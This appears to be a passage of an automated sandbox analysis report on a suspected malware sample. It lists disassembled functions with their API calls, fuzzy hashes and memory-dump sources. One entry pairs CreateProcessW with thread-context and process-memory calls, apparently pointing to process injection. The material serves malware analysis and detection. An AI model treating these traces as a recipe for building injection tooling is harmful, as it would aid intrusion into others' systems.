                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: f805a7f2c3248ee42d96026e94c54d855e2e68b034ab76493f843757350de0b4
                                                            • Instruction ID: 6bad54295b5420c8627907ea8d691c587d42845911921be21cbc199a00b2c4c1
                                                            • Opcode Fuzzy Hash: f805a7f2c3248ee42d96026e94c54d855e2e68b034ab76493f843757350de0b4
                                                            • Instruction Fuzzy Hash: 6401F574248308BEF7280E24CC8AF667BDDEB02778F108319BAE55A1E0C7B01E458B10
                                                            APIs
                                                              • Part of subcall function 001C594C: __FF_MSGBANNER.LIBCMT ref: 001C5963
                                                              • Part of subcall function 001C594C: __NMSG_WRITE.LIBCMT ref: 001C596A
                                                              • Part of subcall function 001C594C: RtlAllocateHeap.NTDLL(00B80000,00000000,00000001,00000000,?,?,?,001C1013,?), ref: 001C598F
                                                            • std::exception::exception.LIBCMT ref: 001C102C
                                                            • __CxxThrowException@8.LIBCMT ref: 001C1041
                                                              • Part of subcall function 001C87DB: RaiseException.KERNEL32(?,?,?,0025BAF8,00000000,?,?,?,?,001C1046,?,0025BAF8,?,00000001), ref: 001C8830
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                            • String ID:
                                                            • API String ID: 3902256705-0
                                                            • Opcode ID: 0c7141c1014db5b3767f930b47ca82520b065c561768099fc08c805476c7d203
                                                            • Instruction ID: 739282cfb5327a94835a3054c2802e8a7b7492e33219974adbae13af94bd9b64
                                                            • Opcode Fuzzy Hash: 0c7141c1014db5b3767f930b47ca82520b065c561768099fc08c805476c7d203
                                                            • Instruction Fuzzy Hash: F5F0D17554021DB6CB21AA98EC05FDE7BA89F31350F20042EFC04A2182EBB0CAA482E1
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: __lock_file_memset
                                                            • String ID:
                                                            • API String ID: 26237723-0
                                                            • Opcode ID: 8c062ca2d69dc73d3b906b1cb7c4f10d21ad6dacad7fed2ca318f0c807a4d22a
                                                            • Instruction ID: d36d7262ae028f03c25fdd4642cb7d54568a557901415c5c72c2ea1a409e689f
                                                            • Opcode Fuzzy Hash: 8c062ca2d69dc73d3b906b1cb7c4f10d21ad6dacad7fed2ca318f0c807a4d22a
                                                            • Instruction Fuzzy Hash: DB014871800615EBCF12AF6A8C05F9E7B62AF71360F15821DF8145A161DB31DA61DB91
                                                            APIs
                                                              • Part of subcall function 001C8D68: __getptd_noexit.LIBCMT ref: 001C8D68
                                                            • __lock_file.LIBCMT ref: 001C561B
                                                              • Part of subcall function 001C6E4E: __lock.LIBCMT ref: 001C6E71
                                                            • __fclose_nolock.LIBCMT ref: 001C5626
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                            • String ID:
                                                            • API String ID: 2800547568-0
                                                            • Opcode ID: 7f6918bd09f5fa15e68481fe061ccb23fca648d1fcd290a176a0864997d4573a
                                                            • Instruction ID: 9311e41f4ac4e7b79047c1b9160265dd83d08facbfdf36e4ce05d2f875e809b7
                                                            • Opcode Fuzzy Hash: 7f6918bd09f5fa15e68481fe061ccb23fca648d1fcd290a176a0864997d4573a
                                                            • Instruction Fuzzy Hash: EDF0B471800A249AD721AF798802F6E77E26FB1334F55820DE415AB1C1CF7CED819B59
                                                            APIs
                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 034D1A5B
                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 034D1AF1
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 034D1B13
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701993742.00000000034D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_34d0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                            • String ID:
                                                            • API String ID: 2438371351-0
                                                            • Opcode ID: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
                                                            • Instruction ID: c6af9f310c76e587420ef97ce64f857ab11d21d22f3edc4dbfc91091bc368b59
                                                            • Opcode Fuzzy Hash: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
                                                            • Instruction Fuzzy Hash: CC12BE24E24658C6EB24DF64D8507DEB232EF68300F1094E9D10DEB7A5E77A4E81CF5A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0e41390b78c3cf33296023baaa85187e04e7401e2452f1c6efa360fdc30e93bd
                                                            • Instruction ID: 22b719d6af392daf98af35e277f01ecbf0e342245ed36185d17a7b85f119f4f8
                                                            • Opcode Fuzzy Hash: 0e41390b78c3cf33296023baaa85187e04e7401e2452f1c6efa360fdc30e93bd
                                                            • Instruction Fuzzy Hash: 0B518435704604AFCF14EB68C991FBE77A6AFA5354F158168F906AB392CB30ED04CB51
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID:
                                                            • API String ID: 4104443479-0
                                                            • Opcode ID: 464124430e8de5960c13c3c2f65887e6ee4843d4792a7d1da34d152b5713a97e
                                                            • Instruction ID: b353606b9164879b6409d0e618912ced09e43e5d1a460eb59a65c13392021d0b
                                                            • Opcode Fuzzy Hash: 464124430e8de5960c13c3c2f65887e6ee4843d4792a7d1da34d152b5713a97e
                                                            • Instruction Fuzzy Hash: 6B31C37D608A02DFD7289F18C894A26F7E0FF1A310715C56DE88A8B3A5E730D881CB84
                                                            APIs
                                                            • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 001A5CF6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: FilePointer
                                                            • String ID:
                                                            • API String ID: 973152223-0
                                                            • Opcode ID: 87dec76dd0e5f11705b0b1a0d7b045dfd5a997e0004470bcd54e3a29cc633ec0
                                                            • Instruction ID: 322858d5d8bfd4380bf1c12dc6f41af9a91c5a5be6478f8b3cecc7dd920c5093
                                                            • Opcode Fuzzy Hash: 87dec76dd0e5f11705b0b1a0d7b045dfd5a997e0004470bcd54e3a29cc633ec0
                                                            • Instruction Fuzzy Hash: 8831AD35A04B09AFCB18DF6DC484AADB7B6FF48320F148629E81993708D730BD60DB90
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ClearVariant
                                                            • String ID:
                                                            • API String ID: 1473721057-0
                                                            • Opcode ID: 9dc1c9ad7ea69bcf59226d23bce1eaffe2458a5b208392cf54a012590f8bb6df
                                                            • Instruction ID: 85a28187bf201485ae6fd4f722eacd6f326a3d0aa60d0cdd5a2246ce7bfa5efa
                                                            • Opcode Fuzzy Hash: 9dc1c9ad7ea69bcf59226d23bce1eaffe2458a5b208392cf54a012590f8bb6df
                                                            • Instruction Fuzzy Hash: 73412A78508751DFDB25DF54C484B1ABBE0BF5A318F1988ACE9894B362C372EC85CB52
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID:
                                                            • API String ID: 4104443479-0
                                                            • Opcode ID: 64602025b210a69d44d795642d596fdfc93abb49ffaa1266944914acc7b2a18e
                                                            • Instruction ID: 943665ec922f98a6f42233d532ef81b7371dddb76a734c002eab5ba5d51f2f42
                                                            • Opcode Fuzzy Hash: 64602025b210a69d44d795642d596fdfc93abb49ffaa1266944914acc7b2a18e
                                                            • Instruction Fuzzy Hash: 3911E136208205AFD715DF28D881C6EB7A8EF46364728851EF815CB2E1DB32ED118BD0
                                                            APIs
                                                              • Part of subcall function 001A4D13: FreeLibrary.KERNEL32(00000000,?), ref: 001A4D4D
                                                              • Part of subcall function 001C548B: __wfsopen.LIBCMT ref: 001C5496
                                                            • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,002662F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 001A4F6F
                                                              • Part of subcall function 001A4CC8: FreeLibrary.KERNEL32(00000000), ref: 001A4D02
                                                              • Part of subcall function 001A4DD0: _memmove.LIBCMT ref: 001A4E1A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Library$Free$Load__wfsopen_memmove
                                                            • String ID:
                                                            • API String ID: 1396898556-0
                                                            • Opcode ID: 8e53922c7563eedda7b74e8b7b607fd5358dbc14aca526148877f8c9c3781ecc
                                                            • Instruction ID: eb4bfa3a67c9cf136c41c0c2131147fe7a578aca7753e22240cf524eb4f60958
                                                            • Opcode Fuzzy Hash: 8e53922c7563eedda7b74e8b7b607fd5358dbc14aca526148877f8c9c3781ecc
                                                            • Instruction Fuzzy Hash: 7911E735600705AFCF14AFB4DD02FAE77A59F95710F108439F941A62C1DBF19A159B60
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ClearVariant
                                                            • String ID:
                                                            • API String ID: 1473721057-0
                                                            • Opcode ID: 115e426fa7fd647d654a9ef9787f2cb8cfa8db286e9989df8cdd7098940e7c2d
                                                            • Instruction ID: 118ca14ba6f617f2ca391a51215946aaa6d0aac26efd1a7f51858ac4885df8d2
                                                            • Opcode Fuzzy Hash: 115e426fa7fd647d654a9ef9787f2cb8cfa8db286e9989df8cdd7098940e7c2d
                                                            • Instruction Fuzzy Hash: 7E2122B8508341DFCB24DF54C884B1ABBE0BF8A314F05896CF98A47722D731E899CB52
                                                            APIs
                                                            • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,001A5807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 001A5D76
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: FileRead
                                                            • String ID:
                                                            • API String ID: 2738559852-0
                                                            • Opcode ID: 27802188862ed485545adbba78d07d1cfd1b9dd4b2e651514c478980f6e34ff3
                                                            • Instruction ID: 90377411ce5895e266304a97d78da8f970045fb05bac6cd86a628dfbf3a8cac0
                                                            • Opcode Fuzzy Hash: 27802188862ed485545adbba78d07d1cfd1b9dd4b2e651514c478980f6e34ff3
                                                            • Instruction Fuzzy Hash: A9113A39208B019FD3308F55C488B66B7FAEF46764F10C92EE5AA86A50D7B0E945CB60
                                                            APIs
                                                            • __lock_file.LIBCMT ref: 001C4AD6
                                                              • Part of subcall function 001C8D68: __getptd_noexit.LIBCMT ref: 001C8D68
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: __getptd_noexit__lock_file
                                                            • String ID:
                                                            • API String ID: 2597487223-0
                                                            • Opcode ID: 6d38c5d86aa2593521dba9b5a4441cebb8b525e128e59ecb86ce20442c24f41e
                                                            • Instruction ID: 2b7b3c31d5095556fdb1c1b76015642224dc46726ee5d0711727a09420c41557
                                                            • Opcode Fuzzy Hash: 6d38c5d86aa2593521dba9b5a4441cebb8b525e128e59ecb86ce20442c24f41e
                                                            • Instruction Fuzzy Hash: EBF0AF31944219ABDF61AFA48C06BAE76A1AF30329F04851CF824AB1D1CB78CE51DF55
                                                            APIs
                                                            • FreeLibrary.KERNEL32(?,?,002662F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 001A4FDE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID:
                                                            • API String ID: 3664257935-0
                                                            • Opcode ID: e8c4e96de4c8983c99555fb77f7dca729f56ffb1fdff7e89fb74510b6905546f
                                                            • Instruction ID: eb88b30db46ab6f9b9daba47b999539535deb7f074f1b647c1805f8b8b3ba632
                                                            • Opcode Fuzzy Hash: e8c4e96de4c8983c99555fb77f7dca729f56ffb1fdff7e89fb74510b6905546f
                                                            • Instruction Fuzzy Hash: 1CF06575105711CFC7349F68E494822BBF1BF553293219A3EE5D782610C7B1A854DF40
                                                            APIs
                                                            • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 001C09F4
                                                              • Part of subcall function 001A7D2C: _memmove.LIBCMT ref: 001A7D66
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: LongNamePath_memmove
                                                            • String ID:
                                                            • API String ID: 2514874351-0
                                                            • Opcode ID: 762cd7327ac4ddd1413fe905db07ce367705f567c54e21cc1481a32c8e61faf0
                                                            • Instruction ID: 0903f80b444437697e605661ae64f0aa77147b09ed102f581de149b53c52d418
                                                            • Opcode Fuzzy Hash: 762cd7327ac4ddd1413fe905db07ce367705f567c54e21cc1481a32c8e61faf0
                                                            • Instruction Fuzzy Hash: 6CE0863690422867C720D6989C05FFA77ADDF896A0F0401B6FC4CD7248DA609D818690
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: __fread_nolock
                                                            • String ID:
                                                            • API String ID: 2638373210-0
                                                            • Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                                            • Instruction ID: 87ba2f93792d9d68b471bd5c2f6305ffd32b362b75bb0d53fd8362f1d78fe30a
                                                            • Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                                            • Instruction Fuzzy Hash: DCE092B0614B019FDB348E24D850BE3B3E1AB16315F00091CF29B83342EB62B8818759
                                                            APIs
                                                            • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,001DE16B,?,?,00000000), ref: 001A5DBF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: FilePointer
                                                            • String ID:
                                                            • API String ID: 973152223-0
                                                            • Opcode ID: 785f639a59c1d77a58604726d03a67f3be28d7ae105572ad71668e9ea0bb3811
                                                            • Instruction ID: 39639f52ff83133a91d9ac8e10e2853e088d884ebc19e981f23f57173274b70e
                                                            • Opcode Fuzzy Hash: 785f639a59c1d77a58604726d03a67f3be28d7ae105572ad71668e9ea0bb3811
                                                            • Instruction Fuzzy Hash: C9D0C77564020CBFE710DB80DC46FA9777CD705710F500194FD0456290D6B27D508795
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: __wfsopen
                                                            • String ID:
                                                            • API String ID: 197181222-0
                                                            • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                            • Instruction ID: ba14ea62f5dd582cf78709fe8bab8ebd68a37fbdcadb8125a7de912d72f7466e
                                                            • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                            • Instruction Fuzzy Hash: 5FB0927684020C77DF012E82EC03F593B1A9B60679F808020FB0C18162A673E6A09689
                                                            APIs
                                                            • GetLastError.KERNEL32(00000002,00000000), ref: 0020D46A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast
                                                            • String ID:
                                                            • API String ID: 1452528299-0
                                                            • Opcode ID: 235cb31bb956e988e16943fce137cbc815898ee8dadab07ae8ab0c14b8116cbe
                                                            • Instruction ID: 198e20a10c8202f041231cd5478bbf60caa6a6979ddd054e236a8ed1ff48f04b
                                                            • Opcode Fuzzy Hash: 235cb31bb956e988e16943fce137cbc815898ee8dadab07ae8ab0c14b8116cbe
                                                            • Instruction Fuzzy Hash: 5B7172342193028FC714EF64C4D1A6EB7E5AF99314F04496DF8968B2E2DB30ED59CB52
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
